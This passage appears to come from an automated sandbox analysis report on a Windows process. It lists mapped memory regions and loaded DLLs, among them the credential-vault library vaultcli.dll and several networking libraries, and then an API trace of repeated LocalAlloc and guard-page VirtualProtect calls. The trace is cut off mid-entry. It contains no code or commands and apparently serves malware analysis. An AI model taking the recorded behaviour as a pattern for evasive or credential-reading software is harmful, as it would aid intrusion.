filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2404 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2405 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2406 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2407 start_va = 0x7c0000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2412 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2413 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2414 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2415 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2416 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2417 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2418 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2419 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2420 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2421 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2736 start_va = 0x71590000 end_va = 0x7179cfff monitored = 0 entry_point = 0x7167acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2737 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2738 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2739 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2740 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2741 start_va = 0x440000 end_va = 0x469fff monitored = 0 entry_point = 0x445680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2742 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2743 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2744 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2745 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2746 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2747 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 2748 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 2749 start_va = 0x76be0000 end_va = 0x76bf2fff monitored = 0 entry_point = 0x76be1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2754 start_va = 0x764d0000 end_va = 0x764d5fff monitored = 0 entry_point = 0x764d1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2755 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2756 start_va = 0x6fed0000 end_va = 0x6ff09fff monitored = 0 entry_point = 0x6fee9be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 2761 start_va = 0x6fe00000 end_va = 0x6fec7fff monitored = 0 entry_point = 0x6fe6ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 2762 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2763 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2764 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2765 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2766 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2767 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2768 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2769 start_va = 0x6f8d0000 end_va = 0x6fa3afff monitored = 0 entry_point = 0x6f93e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 2775 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2780 start_va = 0x7c0000 end_va = 0x850fff monitored = 0 entry_point = 0x7f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2781 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2791 start_va = 0x6f790000 end_va = 0x6f8cefff monitored = 0 entry_point = 0x6f7bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2793 start_va = 0x460000 end_va = 0x463fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2794 start_va = 0x6f780000 end_va = 0x6f787fff monitored = 0 entry_point = 0x6f781c60 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 2795 start_va = 0x1fa0000 end_va = 0x839ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 2799 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2801 start_va = 0x83a0000 end_va = 0x86d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2802 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2803 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2804 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 2805 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2810 start_va = 0x71540000 end_va = 0x71551fff monitored = 0 entry_point = 0x71544510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 2811 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2812 start_va = 0x71470000 end_va = 0x7150afff monitored = 0 entry_point = 0x714af7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2817 start_va = 0x7c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2818 start_va = 0x86e0000 end_va = 0x87dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086e0000" filename = "" Region: id = 2819 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2820 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2821 start_va = 0x71410000 end_va = 0x71417fff monitored = 0 entry_point = 0x71411fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2827 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2828 start_va = 0x87e0000 end_va = 0x88dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 2829 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2831 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2832 start_va = 0x717a0000 end_va = 0x7191dfff monitored = 0 entry_point = 0x7181c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2837 start_va = 0x88e0000 end_va = 0x891ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088e0000" filename = "" Region: id = 2838 start_va = 0x8920000 end_va = 0x8a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008920000" filename = "" Region: id = 2839 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2863 start_va = 0x8a20000 end_va = 0x8a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 2864 start_va = 0x8a60000 end_va = 0x8b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a60000" filename = "" Region: id = 2865 start_va = 0x6f730000 end_va = 0x6f776fff monitored = 0 entry_point = 0x6f7458d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2870 start_va = 0x6f720000 end_va = 0x6f727fff monitored = 0 entry_point = 0x6f721920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2872 start_va = 0x4b0000 end_va = 0x4b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 2873 start_va = 0x5c0000 end_va = 0x5c7fff monitored = 0 entry_point = 0x5c19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 2874 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 2879 start_va = 0x5c0000 end_va = 0x5c7fff monitored = 0 entry_point = 0x5c19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 2880 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 2881 start_va = 0x5c0000 end_va = 0x5c7fff monitored = 0 entry_point = 0x5c19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 2882 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 2883 start_va = 0x5c0000 end_va = 0x5c7fff monitored = 0 entry_point = 0x5c19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 2884 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 2904 start_va = 0x8b60000 end_va = 0xeaccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b60000" filename = "" Region: id = 2969 start_va = 0xead0000 end_va = 0xeb79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ead0000" filename = "" Region: id = 2970 start_va = 0xeb80000 end_va = 0xec76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eb80000" filename = "" Region: id = 2971 start_va = 0x60900000 end_va = 0x60991fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000060900000" filename = "" Region: id = 2992 start_va = 0xec80000 end_va = 0xed83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ec80000" filename = "" Region: id = 2993 start_va = 0x5c0000 end_va = 0x5c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 2994 start_va = 0x5d0000 end_va = 0x5dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 2999 start_va = 0xed90000 end_va = 0xee1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ed90000" filename = "" Region: id = 3000 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3001 start_va = 0xee20000 end_va = 0xeeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 3007 start_va = 0xed90000 end_va = 0xedcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ed90000" filename = "" Region: id = 3008 start_va = 0xee10000 end_va = 0xee1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee10000" filename = "" Region: id = 3009 start_va = 0xee20000 end_va = 0xee9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 3010 start_va = 0xeea0000 end_va = 0xeeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eea0000" filename = "" Region: id = 3011 start_va = 0xeeb0000 end_va = 0xefaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eeb0000" filename = "" Region: id = 3016 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3017 start_va = 0xefb0000 end_va = 0xf4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000efb0000" filename = "" Region: id = 3018 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 3019 start_va = 0xf4b0000 end_va = 0xf9a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4b0000" filename = "" Region: id = 3024 start_va = 0x6f5a0000 end_va = 0x6f712fff monitored = 0 entry_point = 0x6f64d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 3025 start_va = 0xf9b0000 end_va = 0xfaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9b0000" filename = "" Region: id = 3026 start_va = 0xfab0000 end_va = 0xfbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fab0000" filename = "" Region: id = 3031 start_va = 0xfbb0000 end_va = 0x103c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fbb0000" filename = "" Region: id = 3076 start_va = 0xed90000 end_va = 0xedcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ed90000" filename = "" Region: id = 3077 start_va = 0xeeb0000 end_va = 0xefaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eeb0000" filename = "" Region: id = 3078 start_va = 0x6fc60000 end_va = 0x6fdaafff monitored = 0 entry_point = 0x6fcc1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3081 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 3082 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3085 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3086 start_va = 0x860000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3087 start_va = 0xedd0000 end_va = 0xee14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 3088 start_va = 0xf4b0000 end_va = 0xf4b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3089 start_va = 0xf4c0000 end_va = 0xf54dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 3090 start_va = 0xf550000 end_va = 0xf560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 3095 start_va = 0xf570000 end_va = 0xf573fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3096 start_va = 0xf580000 end_va = 0xf593fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 3097 start_va = 0xf5a0000 end_va = 0xf5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f5a0000" filename = "" Region: id = 3106 start_va = 0xf5b0000 end_va = 0xf5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5b0000" filename = "" Region: id = 3107 start_va = 0xf5f0000 end_va = 0xf6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5f0000" filename = "" Region: id = 3108 start_va = 0xf6f0000 end_va = 0xf72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f6f0000" filename = "" Region: id = 3109 start_va = 0xf730000 end_va = 0xf82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f730000" filename = "" Region: id = 3154 start_va = 0x6f590000 end_va = 0x6f59bfff monitored = 0 entry_point = 0x6f594ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 3159 start_va = 0x6f570000 end_va = 0x6f585fff monitored = 0 entry_point = 0x6f5721d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 152 os_tid = 0x5ac [0147.846] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c3568 [0147.846] VirtualProtect (in: lpAddress=0x4c3568, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.853] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c3580 [0147.853] VirtualProtect (in: lpAddress=0x4c3580, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.853] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c3598 [0147.853] VirtualProtect (in: lpAddress=0x4c3598, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.855] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c35b0 [0147.855] VirtualProtect (in: lpAddress=0x4c35b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.855] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c28e0 [0147.855] VirtualProtect (in: lpAddress=0x4c28e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.856] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c28f8 [0147.856] VirtualProtect (in: lpAddress=0x4c28f8, dwSize=0x4, 